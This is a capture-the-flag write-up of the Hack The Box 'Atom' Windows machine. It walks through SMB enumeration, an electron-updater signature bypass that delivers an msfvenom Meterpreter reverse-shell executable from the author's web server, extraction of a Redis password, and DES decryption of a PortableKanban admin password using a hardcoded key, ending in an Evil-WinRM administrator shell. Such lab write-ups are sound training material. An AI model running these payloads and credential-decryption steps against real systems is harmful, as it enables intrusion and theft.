After what seems like forever I am returning to a windows machine, a box that has kept me busy for a long time, both on the user and root side, perhaps due to personal oversights or perhaps due to a bit of rust in the windows environment :)

Lets jump right in with the nmap scan:

Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-26 13:05 CEST
Nmap scan report for 10.10.10.237
Host is up (0.043s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE      VERSION
80/tcp  open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Heed Solutions
135/tcp open  msrpc        Microsoft Windows RPC
443/tcp open  ssl/http     Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Heed Solutions
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: ATOM; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h31m07s, deviation: 4h02m30s, median: 11m06s
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: ATOM
|   NetBIOS computer name: ATOM\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-04-26T04:16:55-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-04-26T11:16:54
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.19 seconds


As usual, the open doors of a windows machine are always higher than the bare minimum. The information is a lot, but let's focus on the usual port 80, where the webserver runs, however, strangely is not the classic native IIS, but seems to be an Apache Server, probably some php application is running.

The portal seems to be a landing page presenting a tool that can be downloaded a little further below, unfortunately only in the windows version.

My first approach is to immediately try to see if I can establish a samba connection and apparently there seems to be something interesting.

┌──(in7rud3r㉿kali-vm-off)-[~/Dropbox/hackthebox/_10.10.10.237 - Atom (win)]
└─$ smbclient -L 10.10.10.237                                                                                 1 ⨯
Enter WORKGROUP\in7rud3r's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Software_Updates Disk      
SMB1 disabled -- no workgroup available


There seems to be a share called "Software_Updates", I'm curious to see what's inside, but we'll come back to that later, now I want to analyze the downloaded software.

The software immediately seems strange, its size first of all, about 97 MB for a tool that does nothing else manage a sort of TODO list. Even when I launched the program (obviously in a Virtual windows machine) the only interface available is the one shown in the screenshot also present in the portal, so a dimension like this is really strange for such a simple program.

This was one of the points that misled me, the large size of the file convinced me that there was something useful inside the resolution of the BOX foothold, but as you will see, it wasn't like that.

Disassembling the program, I find a long series of linked libraries and I discover that it is an electron application; this could explain the considerable size. In any case, unable to find anything particularly interesting and strange, I go back to the samba connection.

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox/_10.10.10.237 - Atom (win)]
└─$ smbclient \\\\10.10.10.237\\Software_Updates
Enter WORKGROUP\in7rud3r's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat May  1 12:12:57 2021
  ..                                  D        0  Sat May  1 12:12:57 2021
  client1                             D        0  Sat May  1 12:12:59 2021
  client2                             D        0  Sat May  1 12:12:57 2021
  client3                             D        0  Sat May  1 12:12:57 2021
  UAT_Testing_Procedures.pdf          A    35202  Fri Apr  9 13:18:08 2021

                4413951 blocks of size 4096. 1359349 blocks available


A pdf file is available in the root of the share, obviously I download it immediately.

smb: \> get UAT_Testing_Procedures.pdf
getting file \UAT_Testing_Procedures.pdf of size 35202 as UAT_Testing_Procedures.pdf (127.8 KiloBytes/sec) (average 127.8 KiloBytes/sec)


In the other three folders (client1, 2 and 3) there seems to be nothing, except for the client3 folder, where a file named "latest.yml" appears, but when I try to download it, the file is not there and checking again the folder is empty. Well, I may have stumbled upon some other hacker's exploit.

smb: \> dir client1
  client1                             D        0  Sat May  1 12:18:07 2021

                4413951 blocks of size 4096. 1368136 blocks available
smb: \> cd client1
smb: \client1\> dir
  .                                   D        0  Sat May  1 12:18:07 2021
  ..                                  D        0  Sat May  1 12:18:07 2021

                4413951 blocks of size 4096. 1367084 blocks available
smb: \client1\> cd ..
smb: \> cd client2
smb: \client2\> dir
  .                                   D        0  Sat May  1 12:18:07 2021
  ..                                  D        0  Sat May  1 12:18:07 2021

                4413951 blocks of size 4096. 1366968 blocks available
smb: \client2\> cd ..
smb: \> cd client3
smb: \client3\> dir
  .                                   D        0  Sat May  1 12:21:40 2021
  ..                                  D        0  Sat May  1 12:21:40 2021
  latest.yml                          A      155  Sat May  1 12:21:40 2021

                4413951 blocks of size 4096. 1366961 blocks available
smb: \client3\> get latest.yml
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \client3\latest.yml
smb: \client3\> dir
  .                                   D        0  Sat May  1 12:23:12 2021
  ..                                  D        0  Sat May  1 12:23:12 2021

                4413951 blocks of size 4096. 1366959 blocks available

Reading the pdf file, I find some interesting information and above all, it confirms my analysis about electron.

There appears to be no interaction with a server, so it is a stand-alone application for the moment. Another interesting thing is the procedure for submitting an updated version of the software. I'm not sure what kind of update, since from what it describes it will be the server that downloads an updated version (logic escapes me, but I'll go ahead). At the moment I have no idea how electron and the update systems developed on this technology work, but I certainly don't lack the resources to go and find out.

After some basic concepts, I try to get straight to the point and look for "electron-builder exploit"; Here, consulting the links returned by google, I realize that the third link, as it happens, reports a latest.yml file to manage the updates of the applications developed in electron.

It must have been luck, but the temporary appearance of that file during the enumeration on the samba connection, has suggested me the right way.
Signature Validation Bypass Leading to RCE In Electron-Updater · Doyensec’s Blog
Doyensec’s Blog :: Doyensec is an independent security research and development company focused on vulnerability discovery and remediation.

To try to understand how the software update works, I try to do some connection tests, modifying the file leaving out some details, but I could not establish some sort of connection.

I have to proceed to create a real exploit; what better choice than msfvenom.

Creating Metasploit Payloads

The best solution is the reverse shell for windows, so change the IP address and the desired port and create the exe.

┌──(in7rud3r㉿Mykali)-[~/…/_10.10.10.237 - Atom (win)/attack/electr/file]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.44 LPORT=4444 -f exe > revshell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
                                                                                                                   
┌──(in7rud3r㉿Mykali)-[~/…/_10.10.10.237 - Atom (win)/attack/electr/file]
└─$ ls -la
total 84
drwxr-xr-x 2 in7rud3r in7rud3r  4096 May  1 22:12 .
drwxr-xr-x 3 in7rud3r in7rud3r  4096 May  1 22:12 ..
-rw-r--r-- 1 in7rud3r in7rud3r 73802 May  1 22:13 revshell.exe

┌──(in7rud3r㉿Mykali)-[~/…/_10.10.10.237 - Atom (win)/attack/electr/file]
└─$ cp revshell.exe rev\'shell.exe

┌──(in7rud3r㉿Mykali)-[~/…/_10.10.10.237 - Atom (win)/attack/electr/file]
└─$ shasum -a 512 rev'shell.exe | cut -d " " -f1 | xxd -r -p | base64 
1CojFGtvhsrvlCjlcJR7sFPZv5R66ARbCEkUz5QIiP2io1cJIkFayYfaSMn0Ke52WTSQl4/oIXYY
tJd4qbxBgQ==

This time, I'm sure the data is correct, so I create the latest.yml file...

version: 1.2.3
files:
  - url: http://10.10.14.44:8000/rev'shell.exe
  sha512: 1CojFGtvhsrvlCjlcJR7sFPZv5R66ARbCEkUz5QIiP2io1cJIkFayYfaSMn0Ke52WTSQl4/oIXYYtJd4qbxBgQ==
  size: 46566143
path: http://10.10.14.44:8000/rev'shell.exe
sha512: 1CojFGtvhsrvlCjlcJR7sFPZv5R66ARbCEkUz5QIiP2io1cJIkFayYfaSMn0Ke52WTSQl4/oIXYYtJd4qbxBgQ==
releaseDate: '2021-01-01T00:00:00.000Z'

...I launch a web server in the folder where my payload is contained (exe)...

┌──(in7rud3r㉿Mykali)-[~/…/_10.10.10.237 - Atom (win)/attack/electr/file]
└─$ php -S 10.10.14.44:8000                                                                       
[Sat May  1 22:15:29 2021] PHP 7.4.15 Development Server (http://10.10.14.44:8000) started

...and finally I start a listener on my machine.

┌──(in7rud3r㉿Mykali)-[~/Dropbox]
└─$ nc -lvp 4444
listening on [any] 4444 ...

At this point I can drop the yaml file in one of the three folders on the samba share.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.10.237 - Atom (win)/attack/electr]
└─$ smbclient \\\\10.10.10.237\\Software_Updates
Enter WORKGROUP\in7rud3r's password: 
Try "help" to get a list of possible commands.
smb: \> cd client1
smb: \client1\> put latest.yml 
putting file latest.yml as \client1\latest.yml (3.0 kb/s) (average 3.0 kb/s)
smb: \client1\> dir
  .                                   D        0  Sat May  1 22:32:56 2021
  ..                                  D        0  Sat May  1 22:32:56 2021
  latest.yml                          A      361  Sat May  1 22:32:56 2021

                4413951 blocks of size 4096. 1393511 blocks available

As with the file I saw at the beginning, after a while the file disappears, but nothing happens on my machine; I'm certainly doing something wrong. So I spend a lot of time configuring the whole scenario correctly and step by step I can understand how the yaml file must be written in order to activate the file download from my machine.

version: 1.2.3
path: http://10.10.14.44:8000/rev'shell.exe
sha512: 1CojFGtvhsrvlCjlcJR7sFPZv5R66ARbCEkUz5QIiP2io1cJIkFayYfaSMn0Ke52WTSQl4/oIXYYtJd4qbxBgQ==

This time the yaml file seems to be correct, a call to the web server on my machine comes to download the executable with the reverse shell payload.

┌──(in7rud3r㉿Mykali)-[~/…/_10.10.10.237 - Atom (win)/attack/electr/file]
└─$ php -S 10.10.14.44:8000                                           
[Sat May  1 22:28:15 2021] PHP 7.4.15 Development Server (http://10.10.14.44:8000) started
[Sat May  1 22:34:51 2021] 10.10.10.237:57890 Accepted
[Sat May  1 22:34:51 2021] 10.10.10.237:57890 [200]: (null) /rev%27shell.exe
[Sat May  1 22:34:51 2021] 10.10.10.237:57890 Closing

And a few moments later my listner also activates, but it doesn't seem to work well.

┌──(in7rud3r㉿Mykali)-[~/Dropbox]
└─$ nc -lvp 4444
listening on [any] 4444 ...
10.10.10.237: inverse host lookup failed: Unknown host
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.237] 57893
whoami

dir
dir

I'm probably misusing the metasploit framework. By researching online, I actually find, that the meterpreter payloads must be used with the metasploit console.

How to Create a Reverse TCP Shell Windows Executable Using Metasploit
In this exploit demonstration, I will be using Metasploit to create a malicious payload in the form of windows executable to create a reverse TCP shell.

Setting up the console well, then repeating the previous steps to activate the exploit, this time I get a working shell.

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.14.44
lhost => 10.10.14.44
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.14.44:4444 
--------------------------------------------------------------
[*] Sending stage (175174 bytes) to 10.10.10.237
[*] Meterpreter session 1 opened (10.10.14.44:4444 -> 10.10.10.237:57921) at 2021-05-01 22:43:29 +0200

meterpreter > shell
Process 2700 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19042.906]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
atom\jason

And the relative flag.

C:\>cd users/jason
cd users/jason

C:\Users\jason>cd desktop
cd desktop

C:\Users\jason\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 9793-C2E6

 Directory of C:\Users\jason\Desktop

04/02/2021  10:29 PM    <DIR>          .
04/02/2021  10:29 PM    <DIR>          ..
03/31/2021  02:09 AM             2,353 heedv1.lnk
03/31/2021  02:09 AM             2,353 heedv2.lnk
03/31/2021  02:09 AM             2,353 heedv3.lnk
05/01/2021  03:55 AM                34 user.txt
               4 File(s)          7,093 bytes
               2 Dir(s)   5,701,103,616 bytes free

C:\Users\jason\Desktop>type user.txt
type user.txt
2******************************5

Ok, let's see how to elevate the privileges of this user. I download the 64-bit WinPeas executable on the BOX and let it run (I also tried the batch, but after a long wait, I didn't have an output, it probably timed out). The only interesting things I see are running services, including a redis server and a series of log files, but they don't contain anything interesting..

[...]
  ========================================(Services Information)================================
========                                                                                                           

  [+] Interesting Services -non Microsoft-
   [?] Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted
 paths https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services                             
    Apache2.4(Apache2.4)["C:\xampp\apache\bin\httpd.exe" -k runservice] - Auto - Running
    Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
   =================================================================================================               

    Redis(Redis)["C:\Program Files\Redis\redis-server.exe" --service-run "C:\Program Files\Redis\redis.win
dows-service.conf"] - Auto - Running                                                                               
    This service runs the Redis server
   =================================================================================================               

    ssh-agent(OpenSSH Authentication Agent)[C:\WINDOWS\System32\OpenSSH\ssh-agent.exe] - Disabled - Sto
pped
    Agent to hold private keys used for public key authentication.
   =================================================================================================               

    VGAuthService(VMware, Inc. - VMware Alias Manager and Ticket Service)["C:\Program Files\VMware\VMware 
Tools\VMware VGAuth\VGAuthService.exe"] - Auto - Running                                                           
    Alias Manager and Ticket Service
   =================================================================================================               

    vm3dservice(VMware, Inc. - VMware SVGA Helper Service)[C:\WINDOWS\system32\vm3dservice.exe] - Auto 
- Running
    Helps VMware SVGA driver by collecting and conveying user mode information
   =================================================================================================               

    VMTools(VMware, Inc. - VMware Tools)["C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"] - Auto - 
Running
    Provides support for synchronizing objects between the host and guest operating systems.
   =================================================================================================               
[...]
  [+] Scheduled Applications --Non Microsoft--
   [?] Check if you can modify other users scheduled binaries https://book.hacktricks.xyz/windows/w
indows-local-privilege-escalation/privilege-escalation-with-autorun-binaries                                       
    (ATOM\Administrator) SoftwareUpdates: C:\Users\jason\appdata\roaming\cache\run.bat 
    Permissions file: jason [WriteData/CreateFiles AllAccess]
    Permissions folder(DLL Hijacking): jason [WriteData/CreateFiles AllAccess]
    Trigger: At log on of ATOM\jason
    
   =================================================================================================

    (ATOM\Administrator) UpdateServer: C:\Users\jason\appdata\roaming\cache\http-server.bat 
    Permissions file: jason [WriteData/CreateFiles AllAccess]
    Permissions folder(DLL Hijacking): jason [WriteData/CreateFiles AllAccess]
    Trigger: At log on of ATOM\jason
    
   =================================================================================================
[...]
  [+] Searching hidden files or folders in C:\Users home (can be slow)
                                                                                                                   
     C:\Users\All Users\ntuser.pol
     C:\Users\jason\AppData\Local\Temp\BITE0BD.tmp
     C:\Users\jason\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Windows.PurchaseDialog_6.2.0.
0_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG2                                           
     C:\Users\jason\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Windows.PurchaseDialog_6.2.0.
0_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG1                                           
     C:\Users\jason\AppData\Local\Packages\Windows.ContactSupport_cw5n1h2txyewy\Windows.ContactSupport_10.0.1
0240.16384_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG2                                  
     C:\Users\jason\AppData\Local\Packages\Windows.ContactSupport_cw5n1h2txyewy\Windows.ContactSupport_10.0.1
0240.16384_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG1                                  
[...]

After a few last checks, I go on to study the redis-server. I easily find the folder where the CLI is installed to execute the commands.

C:\Program Files\Redis>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 9793-C2E6

 Directory of C:\Program Files\Redis

05/01/2021  03:56 AM    <DIR>          .
05/01/2021  03:56 AM    <DIR>          ..
07/01/2016  03:54 PM             1,024 EventLog.dll
04/02/2021  07:31 AM    <DIR>          Logs
07/01/2016  03:52 PM            12,618 Redis on Windows Release Notes.docx
07/01/2016  03:52 PM            16,769 Redis on Windows.docx
07/01/2016  03:55 PM           406,016 redis-benchmark.exe
07/01/2016  03:55 PM         4,370,432 redis-benchmark.pdb
07/01/2016  03:55 PM           257,024 redis-check-aof.exe
07/01/2016  03:55 PM         3,518,464 redis-check-aof.pdb
07/01/2016  03:55 PM           268,288 redis-check-dump.exe
07/01/2016  03:55 PM         3,485,696 redis-check-dump.pdb
07/01/2016  03:55 PM           482,304 redis-cli.exe
07/01/2016  03:55 PM         4,517,888 redis-cli.pdb
07/01/2016  03:55 PM         1,553,408 redis-server.exe
07/01/2016  03:55 PM         6,909,952 redis-server.pdb
04/02/2021  07:39 AM            43,962 redis.windows-service.conf
04/02/2021  07:37 AM            43,960 redis.windows.conf
07/01/2016  09:17 AM            14,265 Windows Service Documentation.docx
              16 File(s)     25,902,070 bytes
               3 Dir(s)   5,696,430,080 bytes free

There are two configuration files, but the WinPeas session made just before, suggests me which is the right file to analyze.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.10.237 - Atom (win)/attack/dwnl]
└─$ grep redis output.txt 
    redis-cli(7636)[C:\Program Files\Redis\redis-cli.exe] -- POwn: jason
    Command Line: redis-cli.exe
    Redis(Redis)["C:\Program Files\Redis\redis-server.exe" --service-run "C:\Program Files\Redis\redis.windows-service.conf"] - Auto - Running
grep: output.txt: binary file matches

And the password to query the database appears as if by magic.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.10.237 - Atom (win)/attack/dwnl]
└─$ grep -i pass red2.conf                          
requirepass kidvscat_yes_kidvscat
# If the master is password protected (using the "requirepass" configuration
# masterauth <master-password>
# resync is enough, just passing the portion of data the slave missed while
# Require clients to issue AUTH <PASSWORD> before processing any other
# 150k passwords per second against a good box. This means that you should
# use a very strong password otherwise it will be very easy to break.
# requirepass foobared
Some of the commands on the BOX files, I run them on my machine ... it's not magic, I just downloaded the files on my machine. The steps to do this are to download a version of netcat on the BOX, you can use the web-server already running on your machine and the command curl on the BOX with the --output argument to save the response in a file. You can then use the netcat to move files from one machine to another (but especially from the BOX to your machine).

The password seems to work.

c:\Program Files\Redis>redis-cli ping                                                                              
redis-cli ping                                                                                                     
NOAUTH Authentication required.                                                                                    
                                                                                                                   
                                                                                                                   
c:\Program Files\Redis>redis-cli -a kidvscat_yes_kidvscat ping                                                     
redis-cli -a kidvscat_yes_kidvscat ping                                                                            
PONG 

I try to select some databases, but there seems to be only one with four keys.

C:\Program Files\Redis>redis-cli -a kidvscat_yes_kidvscat keys *
redis-cli -a kidvscat_yes_kidvscat keys *
pk:ids:MetaDataClass
pk:ids:User
pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff
pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0

Here is a simple guide to retrieve the values in the database.

Get Redis keys and values at command prompt
I have a very small data saved in Redis and the following is working as expected that will allow me to download all keys. redis-cli keys * Is there any way to get the keys+values *?

And proceed to extract the values.

C:\Program Files\Redis>redis-cli -a kidvscat_yes_kidvscat type pk:ids:User
redis-cli -a kidvscat_yes_kidvscat type pk:ids:User
set

C:\Program Files\Redis>redis-cli -a kidvscat_yes_kidvscat smembers pk:ids:User
redis-cli -a kidvscat_yes_kidvscat smembers pk:ids:User
e8e29158-d70d-44b1-a1ba-4949d52790a0

C:\Program Files\Redis>redis-cli -a kidvscat_yes_kidvscat type pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
redis-cli -a kidvscat_yes_kidvscat type pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
string

C:\Program Files\Redis>redis-cli -a kidvscat_yes_kidvscat get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
redis-cli -a kidvscat_yes_kidvscat get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
{"Id":"e8e29158d70d44b1a1ba4949d52790a0","Name":"Administrator","Initials":"","Email":"","EncryptedPassword":"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi","Role":"Admin","Inactive":false,"TimeStamp":637530169606440253}

It looks like we have found the administrator password, but it is encrypted. Verifying it would seem that it is a base64, but at first glance it does not seem the classic format, even trying to decode the hash, a readable text does not come out.

Even trying with bash linux, the result is the same.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.10.237 - Atom (win)/attack/dwnl]
└─$ echo Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi | base64 -d                                                          1 ⨯
9�{7r�iT<���f���tI"h$��                                                                                         

I waste more time trying to decrypt the hash and identify what kind of encryption was used, but to no avail. So I decide to go back to the BOX and look for some other interesting file that can give me an indication about it or about some other direction to take. Starting searching for hidden folder (for example).

C:\>dir /a:hd C:\
dir /a:hd C:\
 Volume in drive C has no label.
 Volume Serial Number is 9793-C2E6

 Directory of C:\

04/01/2021  07:41 PM    <DIR>          $Recycle.Bin
04/01/2021  06:17 AM    <DIR>          $WinREAgent
07/10/2015  05:21 AM    <JUNCTION>     Documents and Settings [C:\Users]
04/09/2021  04:19 AM    <DIR>          ProgramData
04/01/2021  03:54 AM    <DIR>          System Volume Information
               0 File(s)              0 bytes
               5 Dir(s)   5,604,548,608 bytes free

Wandering around the various folders I find something strange.

C:\Users\jason>cd downloads
cd downloads

C:\Users\jason\Downloads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 9793-C2E6

 Directory of C:\Users\jason\Downloads

05/02/2021  12:17 PM    <DIR>          .
05/02/2021  12:17 PM    <DIR>          ..
03/31/2021  02:36 AM    <DIR>          node_modules
05/02/2021  12:19 PM           201,927 out.txt
04/02/2021  08:21 PM    <DIR>          PortableKanban
05/02/2021  12:09 PM         1,678,544 winPEASx64.exe
05/02/2021  12:11 PM         1,678,848 winPEASx86.exe
               3 File(s)      3,559,319 bytes
               4 Dir(s)   5,610,557,440 bytes free

C:\Users\jason\Downloads>cd portablekanban
cd portablekanban

C:\Users\jason\Downloads\PortableKanban>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 9793-C2E6

 Directory of C:\Users\jason\Downloads\PortableKanban

04/02/2021  08:21 PM    <DIR>          .
04/02/2021  08:21 PM    <DIR>          ..
02/27/2013  08:06 AM            58,368 CommandLine.dll
11/08/2017  01:52 PM           141,312 CsvHelper.dll
06/22/2016  09:31 PM           456,704 DotNetZip.dll
04/02/2021  07:44 AM    <DIR>          Files
11/23/2017  04:29 PM            23,040 Itenso.Rtf.Converter.Html.dll
11/23/2017  04:29 PM            75,776 Itenso.Rtf.Interpreter.dll
11/23/2017  04:29 PM            32,768 Itenso.Rtf.Parser.dll
11/23/2017  04:29 PM            19,968 Itenso.Sys.dll
11/23/2017  04:29 PM           376,832 MsgReader.dll
07/03/2014  10:20 PM           133,296 Ookii.Dialogs.dll
04/02/2021  07:17 AM    <DIR>          Plugins
04/02/2021  08:22 PM             5,920 PortableKanban.cfg
01/04/2018  09:12 PM           118,184 PortableKanban.Data.dll
01/04/2018  09:12 PM         1,878,440 PortableKanban.exe
01/04/2018  09:12 PM            31,144 PortableKanban.Extensions.dll
04/02/2021  07:21 AM               172 PortableKanban.pk3.lock
09/06/2017  12:18 PM           413,184 ServiceStack.Common.dll
09/06/2017  12:17 PM           137,216 ServiceStack.Interfaces.dll
09/06/2017  12:02 PM           292,352 ServiceStack.Redis.dll
09/06/2017  04:38 AM           411,648 ServiceStack.Text.dll
01/04/2018  09:14 PM         1,050,092 User Guide.pdf
              19 File(s)      5,656,416 bytes
               4 Dir(s)   5,610,557,440 bytes free

It seems that Portable Kanban is a tool for managing agile teams in Kanban metodology. The interesting thing is that searching for this tool on the internet the first result seems to be an exploit... coincidences?

I can't find an official portal, but the tool is available on the softpedia website.

Download Portable Kanban 4.3.6578.38136
Download Portable Kanban - Create various customizable tasks or subtasks and organize them in an efficient manner by turning to this virtual Kanban scheduling system

Let's take a look at the exploit.

PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval
PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval.. local exploit for Windows platform

It appears to be an exploit to crack the tool's passwords, saved in the filewith extension .pk3. Well, hoping that there is an administrator credential, we download and proceed. I don't see the pk3 file, but I have a pk3.lock file which unfortunately the script doesn't seem to interpret well. I then decide to modify the script to make it work on the specific hash.

import json
import base64
from des import * #python3 -m pip install des
import sys

def decode(hash):
        hash = base64.b64decode(hash.encode('utf-8'))
        key = DesKey(b"7ly6UznJ")
        return key.decrypt(hash,initial=b"XuVUm5fR",padding=True).decode('utf-8')

print("{}".format(decode('Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi')))

It seems to work.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.10.237 - Atom (win)/attack/pkan]
└─$ python3 49409.py
kidvscat_admin_@123

I tried running the command to read the flag's file, using the runas to impersonate another user, but suddenly, the reverse shell crashed, so what better time to dust off an old good friend called "EvilWinRM"?

As usual I prefer the docker version of this tool, so the step, if works, it's really simple.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.10.237 - Atom (win)/attack/pkan]
└─$ sudo docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.237 -u Administrator -p 'kidvscat_admin_@123' -s '/ps1_scripts/' -e '/exe_files/'
Unable to find image 'oscarakaelvis/evil-winrm:latest' locally
latest: Pulling from oscarakaelvis/evil-winrm
0ecb575e629c: Pull complete 
7467d1831b69: Pull complete 
feab2c490a3c: Pull complete 
f15a0f46f8c3: Pull complete 
937782447ff6: Pull complete 
d217a8ff1a80: Pull complete 
9a55402e3c10: Pull complete 
1a4a19b9061b: Pull complete 
4ab8e99e8726: Pull complete 
6187676770c0: Pull complete 
512497605732: Pull complete 
ecb2ea650be9: Pull complete 
976033c0cca3: Pull complete 
68621765227f: Pull complete 
8a7dfc306866: Pull complete 
669c88f614e6: Pull complete 
Digest: sha256:0bb74f1c5c4286cdb5949b5c75b137e05377084f9085db85088037850ecf5149
Status: Downloaded newer image for oscarakaelvis/evil-winrm:latest

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---          5/2/2021   2:19 PM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
e******************************6

And that's it... That's all folks... Waiting for you on the next BOX. I'll be back!

The awesome image used in this article was created by Ankur Patar.